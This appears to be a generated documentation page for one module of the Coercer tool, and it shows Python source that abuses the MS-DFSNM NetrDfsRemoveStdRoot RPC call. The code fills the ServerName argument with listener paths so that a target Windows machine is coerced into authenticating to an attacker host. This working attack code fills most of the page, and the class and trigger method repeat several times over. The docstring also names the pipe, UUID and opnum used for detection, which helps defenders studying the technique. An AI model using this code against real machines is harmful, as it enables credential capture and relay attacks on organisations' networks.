coercer.methods.MS_DFSNM.NetrDfsRemoveStdRoot

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : NetrDfsRemoveStdRootResponse.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 14 Sep 2022
 6
 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 8from coercer.network.DCERPCSessionError import DCERPCSessionError
 9from coercer.core.utils import gen_random_name
10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
12
13
class _NetrDfsRemoveStdRoot(NDRCALL):
    """
    Structure to make the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol

    The three fields are the method's parameters in call order. ServerName is
    the coercion vector: NetrDfsRemoveStdRoot.trigger() writes the rendered
    listener path (see NetrDfsRemoveStdRoot.exploit_paths) into it, a random
    NUL-terminated name into RootShare and 0 into ApiFlags.
    """
    opnum = 13  # same value as NetrDfsRemoveStdRoot.function["opnum"]
    structure = (
        ('ServerName', WSTR),  # Type: WCHAR *  - listener UNC/HTTP path (coercion vector)
        ('RootShare', WSTR),   # Type: WCHAR *  - random share name, NUL-terminated by the caller
        ('ApiFlags', DWORD)    # Type: DWORD    - passed as 0 by trigger()
    )
24
25
class _NetrDfsRemoveStdRootResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol

    The response carries no fields, so trigger() only cares whether the
    request raised. NOTE(review): impacket is expected to locate this type by
    the "<request class name>Response" naming convention, so the class name
    must stay in sync with _NetrDfsRemoveStdRoot.
    """
    structure = ()
31
32
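class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

    Method found by:
     - [@filip_dragovic](https://twitter.com/filip_dragovic)

    The coerced authentication is driven by the ServerName argument, which
    receives the rendered listener path from ``exploit_paths`` (this is why
    ``function["vulnerable_arguments"]`` lists only ServerName). For detection
    and filtering purposes the call is identified by the ``\\PIPE\\netdfs``
    named pipe (or the ncacn_ip_tcp endpoint), interface UUID
    4fc742e0-4a10-11cf-8273-00aa004ae673 version 3.0 and opnum 13 - the values
    an RPC filter or a detection rule on the target would key on.
    """

    # Path templates the core renders into ``self.path``. Every template ends
    # with an explicit NUL byte, matching the terminated RootShare value that
    # trigger() builds for the other WSTR field.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports the core may bind to before calling trigger().
    # NOTE(review): the "ncan_np" key is presumably looked up by this exact
    # spelling elsewhere in the project; it is kept as-is for that reason.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\netdfs",
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
        "shortname": "MS-DFSNM"
    }

    # Must agree with _NetrDfsRemoveStdRoot.opnum.
    function = {
        "name": "NetrDfsRemoveStdRoot",
        "opnum": 13,
        "vulnerable_arguments": ["ServerName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Issue a single NetrDfsRemoveStdRoot request over a bound DCERPC session.

        Args:
            dcerpc_session: the session obtained from connect(); None is a
                caller error and is reported on stdout instead of raising.
            target: accepted for interface compatibility and not used here;
                the listener path comes from ``self.path``.

        Returns:
            "" when the request was sent and answered without an exception,
            the caught exception object when the call raised (the caller,
            not this method, interprets it), or None when no session was
            given.
        """
        # Guard clause: keep the original message and None result for a
        # missing session.
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _NetrDfsRemoveStdRoot()
            # ServerName is the coercion vector: the rendered listener path.
            request['ServerName'] = self.path
            # Random NUL-terminated share name for the WSTR field.
            request['RootShare'] = gen_random_name() + '\x00'
            request['ApiFlags'] = 0
            # The response structure is empty (_NetrDfsRemoveStdRootResponse),
            # so the result is not kept; only the absence of an exception matters.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Deliberately broad: the exception itself is the result the core
            # classifies, so it is returned rather than re-raised.
            return err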
class NetrDfsRemoveStdRoot(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
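class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

    Method found by:
     - [@filip_dragovic](https://twitter.com/filip_dragovic)

    The coerced authentication is driven by the ServerName argument, which
    receives the rendered listener path from ``exploit_paths`` (this is why
    ``function["vulnerable_arguments"]`` lists only ServerName). For detection
    and filtering purposes the call is identified by the ``\\PIPE\\netdfs``
    named pipe (or the ncacn_ip_tcp endpoint), interface UUID
    4fc742e0-4a10-11cf-8273-00aa004ae673 version 3.0 and opnum 13 - the values
    an RPC filter or a detection rule on the target would key on.
    """

    # Path templates the core renders into ``self.path``. Every template ends
    # with an explicit NUL byte, matching the terminated RootShare value that
    # trigger() builds for the other WSTR field.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports the core may bind to before calling trigger().
    # NOTE(review): the "ncan_np" key is presumably looked up by this exact
    # spelling elsewhere in the project; it is kept as-is for that reason.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\netdfs",
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
        "shortname": "MS-DFSNM"
    }

    # Must agree with _NetrDfsRemoveStdRoot.opnum.
    function = {
        "name": "NetrDfsRemoveStdRoot",
        "opnum": 13,
        "vulnerable_arguments": ["ServerName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Issue a single NetrDfsRemoveStdRoot request over a bound DCERPC session.

        Args:
            dcerpc_session: the session obtained from connect(); None is a
                caller error and is reported on stdout instead of raising.
            target: accepted for interface compatibility and not used here;
                the listener path comes from ``self.path``.

        Returns:
            "" when the request was sent and answered without an exception,
            the caught exception object when the call raised (the caller,
            not this method, interprets it), or None when no session was
            given.
        """
        # Guard clause: keep the original message and None result for a
        # missing session.
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _NetrDfsRemoveStdRoot()
            # ServerName is the coercion vector: the rendered listener path.
            request['ServerName'] = self.path
            # Random NUL-terminated share name for the WSTR field.
            request['RootShare'] = gen_random_name() + '\x00'
            request['ApiFlags'] = 0
            # The response structure is empty (_NetrDfsRemoveStdRootResponse),
            # so the result is not kept; only the absence of an exception matters.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Deliberately broad: the exception itself is the result the core
            # classifies, so it is returned rather than re-raised.
            return err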

Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\netdfs', 'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}], 'ncacn_ip_tcp': [{'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}]}
protocol = {'longname': '[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol', 'shortname': 'MS-DFSNM'}
function = {'name': 'NetrDfsRemoveStdRoot', 'opnum': 13, 'vulnerable_arguments': ['ServerName']}
def trigger(self, dcerpc_session, target):
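    def trigger(self, dcerpc_session, target):
        """
        Issue a single NetrDfsRemoveStdRoot request over a bound DCERPC session.

        Args:
            dcerpc_session: the session obtained from connect(); None is a
                caller error and is reported on stdout instead of raising.
            target: accepted for interface compatibility and not used here;
                the listener path comes from ``self.path``.

        Returns:
            "" when the request was sent and answered without an exception,
            the caught exception object when the call raised (the caller,
            not this method, interprets it), or None when no session was
            given.
        """
        # Guard clause: keep the original message and None result for a
        # missing session.
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _NetrDfsRemoveStdRoot()
            # ServerName is the coercion vector: the rendered listener path.
            request['ServerName'] = self.path
            # Random NUL-terminated share name for the WSTR field.
            request['RootShare'] = gen_random_name() + '\x00'
            request['ApiFlags'] = 0
            # The response structure is empty (_NetrDfsRemoveStdRootResponse),
            # so the result is not kept; only the absence of an exception matters.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Deliberately broad: the exception itself is the result the core
            # classifies, so it is returned rather than re-raised.
            return err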